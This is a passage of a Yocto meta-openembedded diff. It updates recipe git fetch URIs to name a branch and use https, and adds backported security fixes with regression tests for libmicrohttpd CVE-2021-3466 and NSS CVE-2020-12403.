b/meta-openembedded/meta-oe/recipes-support/inotify-tools/inotify-tools_git.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=ac6c26e52aea428ee7f56dc2c56424c6" SRCREV = "cfa93aa19f81d85b63cd64da30c7499890d4c07d" PV = "3.20.2.2" -SRC_URI = "git://github.com/rvoicilas/${BPN} \ +SRC_URI = "git://github.com/rvoicilas/${BPN};branch=master;protocol=https \ file://0001-Makefile.am-add-build-rule-for-README.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-support/libatasmart/libatasmart_0.19.bb b/meta-openembedded/meta-oe/recipes-support/libatasmart/libatasmart_0.19.bb index 4cfb732932..d084a3b9b1 100644 --- a/meta-openembedded/meta-oe/recipes-support/libatasmart/libatasmart_0.19.bb +++ b/meta-openembedded/meta-oe/recipes-support/libatasmart/libatasmart_0.19.bb @@ -5,7 +5,7 @@ LIC_FILES_CHKSUM = "file://LGPL;md5=2d5025d4aa3495befef8f17206a5b0a1" DEPENDS = "udev" SRCREV = "de6258940960443038b4c1651dfda3620075e870" -SRC_URI = "git://git.0pointer.de/libatasmart.git \ +SRC_URI = "git://git.0pointer.de/libatasmart.git;branch=master \ file://0001-Makefile.am-add-CFLAGS-and-LDFLAGS-definiton.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.2.bb b/meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.2.bb index a954499c69..527de93e40 100644 --- a/meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.2.bb +++ b/meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.2.bb @@ -10,7 +10,7 @@ S = "${WORKDIR}/git" B = "${S}" SRCREV = "e64e752a28a4a41b0a43cba3bedf9571c22af807" -SRC_URI = "git://github.com/rhinstaller/libbytesize;branch=master" +SRC_URI = "git://github.com/rhinstaller/libbytesize;branch=master;protocol=https" inherit gettext autotools python3native diff --git a/meta-openembedded/meta-oe/recipes-support/libcereal/libcereal_1.3.0.bb b/meta-openembedded/meta-oe/recipes-support/libcereal/libcereal_1.3.0.bb index 6fc5881c59..ac6aedfd50 100644 --- a/meta-openembedded/meta-oe/recipes-support/libcereal/libcereal_1.3.0.bb +++ b/meta-openembedded/meta-oe/recipes-support/libcereal/libcereal_1.3.0.bb @@ -7,7 +7,7 @@ LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=e612690af2f575dfd02e2e91443cea23" SRCREV = "02eace19a99ce3cd564ca4e379753d69af08c2c8" -SRC_URI = "git://github.com/USCiLab/cereal.git" +SRC_URI = "git://github.com/USCiLab/cereal.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/libcyusbserial/libcyusbserial_git.bb b/meta-openembedded/meta-oe/recipes-support/libcyusbserial/libcyusbserial_git.bb index 74b5e21e23..c6878577ef 100644 --- a/meta-openembedded/meta-oe/recipes-support/libcyusbserial/libcyusbserial_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/libcyusbserial/libcyusbserial_git.bb @@ -8,7 +8,7 @@ DEPENDS = "libusb udev" PV = "1.0.0+git${SRCPV}" SRCREV = "655e2d544183d094f0e2d119c7e0c6206a0ddb3f" -SRC_URI = "git://github.com/cyrozap/${BPN}.git" +SRC_URI = "git://github.com/cyrozap/${BPN}.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/libfann/libfann_git.bb b/meta-openembedded/meta-oe/recipes-support/libfann/libfann_git.bb index eae24461dc..5ab484d8a5 100644 --- a/meta-openembedded/meta-oe/recipes-support/libfann/libfann_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/libfann/libfann_git.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.md;md5=f14599a2f089f6ff8c97e2baa4e3d575" inherit cmake SRCREV ?= "7ec1fc7e5bd734f1d3c89b095e630e83c86b9be1" -SRC_URI = "git://github.com/libfann/fann.git;branch=master \ +SRC_URI = "git://github.com/libfann/fann.git;branch=master;protocol=https \ " PV = "2.2.0+git${SRCPV}" diff --git a/meta-openembedded/meta-oe/recipes-support/libgit2/libgit2_0.28.4.bb b/meta-openembedded/meta-oe/recipes-support/libgit2/libgit2_0.28.4.bb index 9b9c191049..c971491b1c 100644 --- a/meta-openembedded/meta-oe/recipes-support/libgit2/libgit2_0.28.4.bb +++ b/meta-openembedded/meta-oe/recipes-support/libgit2/libgit2_0.28.4.bb @@ -5,7 +5,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=3f2cd5d3cccd71d62066ba619614592b" DEPENDS = "curl openssl zlib libssh2 libgcrypt" -SRC_URI = "git://github.com/libgit2/libgit2.git;branch=maint/v0.28" +SRC_URI = "git://github.com/libgit2/libgit2.git;branch=maint/v0.28;protocol=https" SRCREV = "106a5f27586504ea371528191f0ea3aac2ad432b" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/libgusb/libgusb_git.bb b/meta-openembedded/meta-oe/recipes-support/libgusb/libgusb_git.bb index e3c0bdd15e..a26c234652 100644 --- a/meta-openembedded/meta-oe/recipes-support/libgusb/libgusb_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/libgusb/libgusb_git.bb @@ -6,7 +6,7 @@ DEPENDS = "glib-2.0 libusb" inherit meson gobject-introspection gtk-doc gettext vala -SRC_URI = "git://github.com/hughsie/libgusb.git" +SRC_URI = "git://github.com/hughsie/libgusb.git;branch=master;protocol=https" SRCREV = "636efc0624aa2a88174220fcabc9764c13d7febf" PV = "0.3.0+git${SRCPV}" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/libharu/libharu_2.3.0.bb b/meta-openembedded/meta-oe/recipes-support/libharu/libharu_2.3.0.bb index 2d1a37c421..86b5ba540f 100644 --- a/meta-openembedded/meta-oe/recipes-support/libharu/libharu_2.3.0.bb +++ b/meta-openembedded/meta-oe/recipes-support/libharu/libharu_2.3.0.bb @@ -6,7 +6,7 @@ DESCRIPTION = "libHaru is a library for generating PDF files. \ LICENSE = "Zlib" LIC_FILES_CHKSUM = "file://README;md5=3ee6bc1f64d9cc7907f44840c8e50cb1" -SRC_URI = "git://github.com/libharu/libharu.git;branch=2_3 \ +SRC_URI = "git://github.com/libharu/libharu.git;branch=2_3;protocol=https \ file://libharu-RELEASE_2_3_0_cmake.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-support/libiio/libiio_git.bb b/meta-openembedded/meta-oe/recipes-support/libiio/libiio_git.bb index f83d9c9225..0892a3693e 100644 --- a/meta-openembedded/meta-oe/recipes-support/libiio/libiio_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/libiio/libiio_git.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING.txt;md5=7c13b3376cea0ce68d2d2da0a1b3a72c" SRCREV = "5f5af2e417129ad8f4e05fc5c1b730f0694dca12" PV = "0.19+git${SRCPV}" -SRC_URI = "git://github.com/analogdevicesinc/libiio.git;protocol=https" +SRC_URI = "git://github.com/analogdevicesinc/libiio.git;protocol=https;branch=master" UPSTREAM_CHECK_GITTAGREGEX = "v(?P\d+(\.\d+)+)" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/libmicrohttpd/libmicrohttpd/CVE-2021-3466.patch b/meta-openembedded/meta-oe/recipes-support/libmicrohttpd/libmicrohttpd/CVE-2021-3466.patch new file mode 100644 index 0000000000..ff792d4daa --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-support/libmicrohttpd/libmicrohttpd/CVE-2021-3466.patch @@ -0,0 +1,158 @@ +From 86d9a61be6395220714b1a50d5144e65668961f6 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Ernst=20Sj=C3=B6strand?= +Date: Tue, 21 Dec 2021 11:05:22 +0000 +Subject: [PATCH] Fix buffer overflow in url parser and add test + +Reference: +https://git.gnunet.org/libmicrohttpd.git/commit/?id=a110ae6276660bee3caab30e9ff3f12f85cf3241 + +Upstream-Status: Backport +CVE: CVE-2021-3466 + +Signed-off-by: Ernst Sjstrand +--- + src/microhttpd/postprocessor.c | 18 ++++++-- + src/microhttpd/test_postprocessor.c | 66 +++++++++++++++++++++++++++++ + 2 files changed, 80 insertions(+), 4 deletions(-) + +diff --git a/src/microhttpd/postprocessor.c b/src/microhttpd/postprocessor.c +index b7f6b10..ebd1686 100644 +--- a/src/microhttpd/postprocessor.c ++++ b/src/microhttpd/postprocessor.c +@@ -137,8 +137,7 @@ struct MHD_PostProcessor + void *cls; + + /** +- * Encoding as given by the headers of the +- * connection. ++ * Encoding as given by the headers of the connection. + */ + const char *encoding; + +@@ -586,7 +585,7 @@ post_process_urlencoded (struct MHD_PostProcessor *pp, + pp->state = PP_Error; + break; + case PP_Callback: +- if ( (pp->buffer_pos + (end_key - start_key) > ++ if ( (pp->buffer_pos + (end_key - start_key) >= + pp->buffer_size) || + (pp->buffer_pos + (end_key - start_key) < + pp->buffer_pos) ) +@@ -636,6 +635,11 @@ post_process_urlencoded (struct MHD_PostProcessor *pp, + { + if (NULL == end_key) + end_key = &post_data[poff]; ++ if (pp->buffer_pos + (end_key - start_key) >= pp->buffer_size) ++ { ++ pp->state = PP_Error; ++ return MHD_NO; ++ } + memcpy (&kbuf[pp->buffer_pos], + start_key, + end_key - start_key); +@@ -663,6 +667,11 @@ post_process_urlencoded (struct MHD_PostProcessor *pp, + last_escape); + pp->must_ikvi = false; + } ++ if (PP_Error == pp->state) ++ { ++ /* State in error, returning failure */ ++ return MHD_NO; ++ } + return MHD_YES; + } + +@@ -1424,7 +1433,8 @@ MHD_destroy_post_processor (struct MHD_PostProcessor *pp) + the post-processing may have been interrupted + at any stage */ + if ( (pp->xbuf_pos > 0) || +- (pp->state != PP_Done) ) ++ ( (pp->state != PP_Done) && ++ (pp->state != PP_Init) ) ) + ret = MHD_NO; + else + ret = MHD_YES; +diff --git a/src/microhttpd/test_postprocessor.c b/src/microhttpd/test_postprocessor.c +index 2c37565..cba486d 100644 +--- a/src/microhttpd/test_postprocessor.c ++++ b/src/microhttpd/test_postprocessor.c +@@ -451,6 +451,71 @@ test_empty_value (void) + } + + ++static enum MHD_Result ++value_checker2 (void *cls, ++ enum MHD_ValueKind kind, ++ const char *key, ++ const char *filename, ++ const char *content_type, ++ const char *transfer_encoding, ++ const char *data, ++ uint64_t off, ++ size_t size) ++{ ++ return MHD_YES; ++} ++ ++ ++static int ++test_overflow () ++{ ++ struct MHD_Connection connection; ++ struct MHD_HTTP_Header header; ++ struct MHD_PostProcessor *pp; ++ size_t i; ++ size_t j; ++ size_t delta; ++ char *buf; ++ ++ memset (&connection, 0, sizeof (struct MHD_Connection)); ++ memset (&header, 0, sizeof (struct MHD_HTTP_Header)); ++ connection.headers_received = &header; ++ header.header = MHD_HTTP_HEADER_CONTENT_TYPE; ++ header.value = MHD_HTTP_POST_ENCODING_FORM_URLENCODED; ++ header.header_size = strlen (header.header); ++ header.value_size = strlen (header.value); ++ header.kind = MHD_HEADER_KIND; ++ for (i = 128; i < 1024 * 1024; i += 1024) ++ { ++ pp = MHD_create_post_processor (&connection, ++ 1024, ++ &value_checker2, ++ NULL); ++ buf = malloc (i); ++ if (NULL == buf) ++ return 1; ++ memset (buf, 'A', i); ++ buf[i / 2] = '='; ++ delta = 1 + (MHD_random_ () % (i - 1)); ++ j = 0; ++ while (j < i) ++ { ++ if (j + delta > i) ++ delta = i - j; ++ if (MHD_NO == ++ MHD_post_process (pp, ++ &buf[j], ++ delta)) ++ break; ++ j += delta; ++ } ++ free (buf); ++ MHD_destroy_post_processor (pp); ++ } ++ return 0; ++} ++ ++ + int + main (int argc, char *const *argv) + { +@@ -463,6 +528,7 @@ main (int argc, char *const *argv) + errorCount += test_multipart (); + errorCount += test_nested_multipart (); + errorCount += test_empty_value (); ++ errorCount += test_overflow (); + if (errorCount != 0) + fprintf (stderr, "Error (code: %u)\n", errorCount); + return errorCount != 0; /* 0 == pass */ diff --git a/meta-openembedded/meta-oe/recipes-support/libmicrohttpd/libmicrohttpd_0.9.70.bb b/meta-openembedded/meta-oe/recipes-support/libmicrohttpd/libmicrohttpd_0.9.70.bb index 94976d2e98..9d5e85e1ad 100644 --- a/meta-openembedded/meta-oe/recipes-support/libmicrohttpd/libmicrohttpd_0.9.70.bb +++ b/meta-openembedded/meta-oe/recipes-support/libmicrohttpd/libmicrohttpd_0.9.70.bb @@ -7,7 +7,8 @@ SECTION = "net" DEPENDS = "file" SRC_URI = "${GNU_MIRROR}/libmicrohttpd/${BPN}-${PV}.tar.gz \ -" + file://CVE-2021-3466.patch \ + " SRC_URI[md5sum] = "dcd6045ecb4ea18c120afedccbd1da74" SRC_URI[sha256sum] = "90d0a3d396f96f9bc41eb0f7e8187796049285fabef82604acd4879590977307" diff --git a/meta-openembedded/meta-oe/recipes-support/libmimetic/libmimetic_0.9.8.bb b/meta-openembedded/meta-oe/recipes-support/libmimetic/libmimetic_0.9.8.bb index 590c4ebc28..fc0b1ee495 100644 --- a/meta-openembedded/meta-oe/recipes-support/libmimetic/libmimetic_0.9.8.bb +++ b/meta-openembedded/meta-oe/recipes-support/libmimetic/libmimetic_0.9.8.bb @@ -10,7 +10,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE;md5=b49da7df0ca479ef01ff7f2d799eabee" SRCREV = "50486af99b4f9b35522d7b3de40b6ce107505279" -SRC_URI += "git://github.com/LadislavSopko/mimetic/ \ +SRC_URI += "git://github.com/LadislavSopko/mimetic/;branch=master;protocol=https \ file://0001-libmimetic-Removing-test-directory-from-the-Makefile.patch \ file://0001-mimetic-Check-for-MMAP_FAILED-return-from-mmap.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-support/libmxml/libmxml_3.1.bb b/meta-openembedded/meta-oe/recipes-support/libmxml/libmxml_3.1.bb index 4e77d6cc02..fd3369d8df 100644 --- a/meta-openembedded/meta-oe/recipes-support/libmxml/libmxml_3.1.bb +++ b/meta-openembedded/meta-oe/recipes-support/libmxml/libmxml_3.1.bb @@ -4,7 +4,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=86d3f3a95c324c9479bd8986968f4327" HOMEPAGE = "https://www.msweet.org/mxml/" BUGTRACKER = "https://github.com/michaelrsweet/mxml/issues" -SRC_URI = "git://github.com/michaelrsweet/mxml.git" +SRC_URI = "git://github.com/michaelrsweet/mxml.git;branch=master;protocol=https" SRCREV = "e483e5fd8a33386fd46967681521bdd2da2b548f" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/libp11/libp11_0.4.10.bb b/meta-openembedded/meta-oe/recipes-support/libp11/libp11_0.4.10.bb index 7fe0640d94..142002a262 100644 --- a/meta-openembedded/meta-oe/recipes-support/libp11/libp11_0.4.10.bb +++ b/meta-openembedded/meta-oe/recipes-support/libp11/libp11_0.4.10.bb @@ -9,7 +9,7 @@ LICENSE = "LGPLv2+" LIC_FILES_CHKSUM = "file://COPYING;md5=fad9b3332be894bab9bc501572864b29" DEPENDS = "libtool openssl" -SRC_URI = "git://github.com/OpenSC/libp11.git" +SRC_URI = "git://github.com/OpenSC/libp11.git;branch=master;protocol=https" SRCREV = "973d31f3f58d5549ddd8b1f822ce8f72186f9d68" UPSTREAM_CHECK_GITTAGREGEX = "libp11-(?P\d+(\.\d+)+)" diff --git a/meta-openembedded/meta-oe/recipes-support/librsync/librsync_2.3.1.bb b/meta-openembedded/meta-oe/recipes-support/librsync/librsync_2.3.1.bb index 004c93d0f9..fddece8d1f 100644 --- a/meta-openembedded/meta-oe/recipes-support/librsync/librsync_2.3.1.bb +++ b/meta-openembedded/meta-oe/recipes-support/librsync/librsync_2.3.1.bb @@ -4,7 +4,7 @@ AUTHOR = "Martin Pool, Andrew Tridgell, Donovan Baarda, Adam Schubert" LICENSE = "LGPLv2.1+" LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499" -SRC_URI = "git://github.com/librsync/librsync.git" +SRC_URI = "git://github.com/librsync/librsync.git;branch=master;protocol=https" SRCREV = "27f738650c20fef1285f11d85a34e5094a71c06f" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/libsoc/libsoc_0.8.2.bb b/meta-openembedded/meta-oe/recipes-support/libsoc/libsoc_0.8.2.bb index 8b773aefa5..f6fc0e36b6 100644 --- a/meta-openembedded/meta-oe/recipes-support/libsoc/libsoc_0.8.2.bb +++ b/meta-openembedded/meta-oe/recipes-support/libsoc/libsoc_0.8.2.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENCE;md5=e0bfebea12a718922225ba987b2126a5" inherit autotools pkgconfig python3-dir SRCREV = "fd1ad6e7823fa76d8db0d3c5884faffa8ffddafb" -SRC_URI = "git://github.com/jackmitch/libsoc.git" +SRC_URI = "git://github.com/jackmitch/libsoc.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/libteam/libteam_1.30.bb b/meta-openembedded/meta-oe/recipes-support/libteam/libteam_1.30.bb index 9cd02b0c09..d04660ca10 100644 --- a/meta-openembedded/meta-oe/recipes-support/libteam/libteam_1.30.bb +++ b/meta-openembedded/meta-oe/recipes-support/libteam/libteam_1.30.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" DEPENDS = "libnl libdaemon jansson" -SRC_URI = "git://github.com/jpirko/libteam \ +SRC_URI = "git://github.com/jpirko/libteam;branch=master;protocol=https \ file://0001-include-sys-select.h-for-fd_set-definition.patch \ file://0002-teamd-Re-adjust-include-header-order.patch \ file://0001-team_basic_test.py-disable-RedHat-specific-test.patch \ diff --git a/meta-openembedded/meta-oe/recipes-support/libtinyxml2/libtinyxml2_8.0.0.bb b/meta-openembedded/meta-oe/recipes-support/libtinyxml2/libtinyxml2_8.0.0.bb index a2491cf9e6..2a33284b8a 100644 --- a/meta-openembedded/meta-oe/recipes-support/libtinyxml2/libtinyxml2_8.0.0.bb +++ b/meta-openembedded/meta-oe/recipes-support/libtinyxml2/libtinyxml2_8.0.0.bb @@ -4,7 +4,7 @@ SECTION = "libs" LICENSE = "Zlib" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=135624eef03e1f1101b9ba9ac9b5fffd" -SRC_URI = "git://github.com/leethomason/tinyxml2.git" +SRC_URI = "git://github.com/leethomason/tinyxml2.git;branch=master;protocol=https" SRCREV = "bf15233ad88390461f6ab0dbcf046cce643c5fcb" diff --git a/meta-openembedded/meta-oe/recipes-support/libusbg/libusbg_git.bb b/meta-openembedded/meta-oe/recipes-support/libusbg/libusbg_git.bb index 97d60a6a8a..6edac56fef 100644 --- a/meta-openembedded/meta-oe/recipes-support/libusbg/libusbg_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/libusbg/libusbg_git.bb @@ -8,7 +8,7 @@ inherit autotools PV = "0.1.0" SRCREV = "a826d136e0e8fa53815f1ba05893e6dd74208c15" -SRC_URI = "git://github.com/libusbg/libusbg.git \ +SRC_URI = "git://github.com/libusbg/libusbg.git;branch=master;protocol=https \ file://0001-Fix-out-of-tree-builds.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-support/libusbgx/libusbgx_git.bb b/meta-openembedded/meta-oe/recipes-support/libusbgx/libusbgx_git.bb index d73ca61060..b88941d6e3 100644 --- a/meta-openembedded/meta-oe/recipes-support/libusbgx/libusbgx_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/libusbgx/libusbgx_git.bb @@ -11,7 +11,7 @@ PV = "0.2.0+git${SRCPV}" SRCREV = "45c14ef4d5d7ced0fbf984208de44ced6d5ed898" SRCBRANCH = "master" SRC_URI = " \ - git://github.com/libusbgx/libusbgx.git;branch=${SRCBRANCH} \ + git://github.com/libusbgx/libusbgx.git;branch=${SRCBRANCH};protocol=https \ file://gadget-start \ file://usbgx.initd \ file://usbgx.service \ diff --git a/meta-openembedded/meta-oe/recipes-support/libutempter/libutempter.bb b/meta-openembedded/meta-oe/recipes-support/libutempter/libutempter.bb index b8a700b7b7..d259f166d1 100644 --- a/meta-openembedded/meta-oe/recipes-support/libutempter/libutempter.bb +++ b/meta-openembedded/meta-oe/recipes-support/libutempter/libutempter.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=2d5025d4aa3495befef8f17206a5b0a1" SRCREV = "3ef74fff310f09e2601e241b9f042cd39d591018" PV = "1.1.6-alt2+git${SRCPV}" -SRC_URI = "git://git.altlinux.org/people/ldv/packages/libutempter.git \ +SRC_URI = "git://git.altlinux.org/people/ldv/packages/libutempter.git;branch=master \ file://0001-Fix-macro-error.patch \ file://0002-Proper-macro-path-generation.patch \ file://libutempter-remove-glibc-assumption.patch \ diff --git a/meta-openembedded/meta-oe/recipes-support/lio-utils/lio-utils_4.1.bb b/meta-openembedded/meta-oe/recipes-support/lio-utils/lio-utils_4.1.bb index 0fb4a6e516..aab81461a4 100644 --- a/meta-openembedded/meta-oe/recipes-support/lio-utils/lio-utils_4.1.bb +++ b/meta-openembedded/meta-oe/recipes-support/lio-utils/lio-utils_4.1.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://debian/copyright;md5=c3ea231a32635cbb5debedf3e88aa3df PV = "4.1+git${SRCPV}" -SRC_URI = "git://github.com/Datera/lio-utils.git \ +SRC_URI = "git://github.com/Datera/lio-utils.git;branch=master;protocol=https \ file://0001-Makefiles-Respect-environment-variables-and-add-LDFL.patch \ " SRCREV = "0ac9091c1ff7a52d5435a4f4449e82637142e06e" diff --git a/meta-openembedded/meta-oe/recipes-support/lvm2/lvm2.inc b/meta-openembedded/meta-oe/recipes-support/lvm2/lvm2.inc index 2fe97d5713..d0fb33d118 100644 --- a/meta-openembedded/meta-oe/recipes-support/lvm2/lvm2.inc +++ b/meta-openembedded/meta-oe/recipes-support/lvm2/lvm2.inc @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12713b4d9386533feeb07d6e4831765a \ DEPENDS += "libaio" -SRC_URI = "git://sourceware.org/git/lvm2.git \ +SRC_URI = "git://sourceware.org/git/lvm2.git;branch=master \ file://lvm.conf \ file://0001-implement-libc-specific-reopen_stream.patch \ file://0002-Guard-use-of-mallinfo-with-__GLIBC__.patch \ diff --git a/meta-openembedded/meta-oe/recipes-support/mcelog/mce-inject_git.bb b/meta-openembedded/meta-oe/recipes-support/mcelog/mce-inject_git.bb index cc33cbaf28..8241bd2342 100644 --- a/meta-openembedded/meta-oe/recipes-support/mcelog/mce-inject_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/mcelog/mce-inject_git.bb @@ -4,7 +4,7 @@ software level into a running Linux kernel. This is intended for \ validation of the kernel machine check handler." SECTION = "System Environment/Base" -SRC_URI = "git://git.kernel.org/pub/scm/utils/cpu/mce/mce-inject.git" +SRC_URI = "git://git.kernel.org/pub/scm/utils/cpu/mce/mce-inject.git;branch=master" SRCREV = "4cbe46321b4a81365ff3aafafe63967264dbfec5" diff --git a/meta-openembedded/meta-oe/recipes-support/mcelog/mce-test_git.bb b/meta-openembedded/meta-oe/recipes-support/mcelog/mce-test_git.bb index 35fb944702..f245515216 100644 --- a/meta-openembedded/meta-oe/recipes-support/mcelog/mce-test_git.bb +++ b/meta-openembedded/meta-oe/recipes-support/mcelog/mce-test_git.bb @@ -10,7 +10,7 @@ containment and recovery, ACPI/APEI support etc." LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3" -SRC_URI = "git://git.kernel.org/pub/scm/utils/cpu/mce/mce-test.git;protocol=git \ +SRC_URI = "git://git.kernel.org/pub/scm/utils/cpu/mce/mce-test.git;protocol=git;branch=master \ file://makefile-remove-ldflags.patch \ file://0001-gcov_merge.py-scov_merge.py-switch-to-python3.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-support/mcelog/mcelog_168.bb b/meta-openembedded/meta-oe/recipes-support/mcelog/mcelog_168.bb index e2ef6ea589..c464132176 100644 --- a/meta-openembedded/meta-oe/recipes-support/mcelog/mcelog_168.bb +++ b/meta-openembedded/meta-oe/recipes-support/mcelog/mcelog_168.bb @@ -5,7 +5,7 @@ and should run on all Linux systems that need error handling." HOMEPAGE = "http://mcelog.org/" SECTION = "System Environment/Base" -SRC_URI = "git://git.kernel.org/pub/scm/utils/cpu/mce/mcelog.git;protocol=http; \ +SRC_URI = "git://git.kernel.org/pub/scm/utils/cpu/mce/mcelog.git;protocol=http;branch=master \ file://run-ptest \ " diff --git a/meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.8.4.bb b/meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.8.4.bb index 8b0c89338f..3cff3b90e5 100644 --- a/meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.8.4.bb +++ b/meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.8.4.bb @@ -29,7 +29,7 @@ DEPENDS = "libdevmapper \ LICENSE = "GPLv2" -SRC_URI = "git://git.opensvc.com/multipath-tools/.git;protocol=http \ +SRC_URI = "git://git.opensvc.com/multipath-tools/.git;protocol=http;branch=master \ file://multipathd.oe \ file://multipath.conf.example \ file://0021-RH-fixup-udev-rules-for-redhat.patch \ diff --git a/meta-openembedded/meta-oe/recipes-support/ne10/ne10_1.2.1.bb b/meta-openembedded/meta-oe/recipes-support/ne10/ne10_1.2.1.bb index f37ccde1cb..6cb53212a4 100644 --- a/meta-openembedded/meta-oe/recipes-support/ne10/ne10_1.2.1.bb +++ b/meta-openembedded/meta-oe/recipes-support/ne10/ne10_1.2.1.bb @@ -4,7 +4,7 @@ LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=e7fe20c9be97be5579e3ab5d92d3a218" SECTION = "libs" -SRC_URI = "git://github.com/projectNe10/Ne10.git \ +SRC_URI = "git://github.com/projectNe10/Ne10.git;branch=master;protocol=https \ file://0001-CMakeLists.txt-Remove-mthumb-interwork.patch \ file://0001-Dont-specify-march-explicitly.patch \ " diff --git a/meta-openembedded/meta-oe/recipes-support/nss/nss/CVE-2020-12403_1.patch b/meta-openembedded/meta-oe/recipes-support/nss/nss/CVE-2020-12403_1.patch new file mode 100644 index 0000000000..a229a2d20f --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-support/nss/nss/CVE-2020-12403_1.patch @@ -0,0 +1,65 @@ +From 9ff9d3925d31ab265a965ab1d16d76c496ddb5c8 Mon Sep 17 00:00:00 2001 +From: Benjamin Beurdouche +Date: Sat, 18 Jul 2020 00:13:38 +0000 +Subject: [PATCH] Bug 1636771 - Fix incorrect call to Chacha20Poly1305 by + PKCS11. r=jcj,kjacobs,rrelyea + +Differential Revision: https://phabricator.services.mozilla.com/D74801 + +--HG-- +extra : moz-landing-system : lando +--- + nss/gtests/pk11_gtest/pk11_chacha20poly1305_unittest.cc | 11 +++++++++-- + nss/lib/freebl/chacha20poly1305.c | 2 +- + 2 files changed, 10 insertions(+), 3 deletions(-) + +CVE: CVE-2020-12403 +Upstream-Status: Backport [https://github.com/nss-dev/nss/commit/9ff9d3925d31ab265a965ab1d16d76c496ddb5c8] +Comment: Refreshed path for whole patchset +Signed-off-by: Ranjitsinh Rathod + +diff --git a/nss/gtests/pk11_gtest/pk11_chacha20poly1305_unittest.cc b/nss/gtests/pk11_gtest/pk11_chacha20poly1305_unittest.cc +index 41f9da71d6..3ea17678d9 100644 +--- a/nss/gtests/pk11_gtest/pk11_chacha20poly1305_unittest.cc ++++ b/nss/gtests/pk11_gtest/pk11_chacha20poly1305_unittest.cc +@@ -45,7 +45,7 @@ class Pkcs11ChaCha20Poly1305Test + SECItem params = {siBuffer, reinterpret_cast(&aead_params), + sizeof(aead_params)}; + +- // Encrypt with bad parameters. ++ // Encrypt with bad parameters (TagLen is too long). + unsigned int encrypted_len = 0; + std::vector encrypted(data_len + aead_params.ulTagLen); + aead_params.ulTagLen = 158072; +@@ -54,9 +54,16 @@ class Pkcs11ChaCha20Poly1305Test + &encrypted_len, encrypted.size(), data, data_len); + EXPECT_EQ(SECFailure, rv); + EXPECT_EQ(0U, encrypted_len); +- aead_params.ulTagLen = 16; ++ ++ // Encrypt with bad parameters (TagLen is too short). ++ aead_params.ulTagLen = 2; ++ rv = PK11_Encrypt(key.get(), kMech, ¶ms, encrypted.data(), ++ &encrypted_len, encrypted.size(), data, data_len); ++ EXPECT_EQ(SECFailure, rv); ++ EXPECT_EQ(0U, encrypted_len); + + // Encrypt. ++ aead_params.ulTagLen = 16; + rv = PK11_Encrypt(key.get(), kMech, ¶ms, encrypted.data(), + &encrypted_len, encrypted.size(), data, data_len); + +diff --git a/nss/lib/freebl/chacha20poly1305.c b/nss/lib/freebl/chacha20poly1305.c +index 970c6436da..5c294a9eaf 100644 +--- a/nss/lib/freebl/chacha20poly1305.c ++++ b/nss/lib/freebl/chacha20poly1305.c +@@ -81,7 +81,7 @@ ChaCha20Poly1305_InitContext(ChaCha20Poly1305Context *ctx, + PORT_SetError(SEC_ERROR_BAD_KEY); + return SECFailure; + } +- if (tagLen == 0 || tagLen > 16) { ++ if (tagLen != 16) { + PORT_SetError(SEC_ERROR_INPUT_LEN); + return SECFailure; + } + diff --git a/meta-openembedded/meta-oe/recipes-support/nss/nss/CVE-2020-12403_2.patch b/meta-openembedded/meta-oe/recipes-support/nss/nss/CVE-2020-12403_2.patch new file mode 100644 index 0000000000..7b093d0cda --- /dev/null +++ 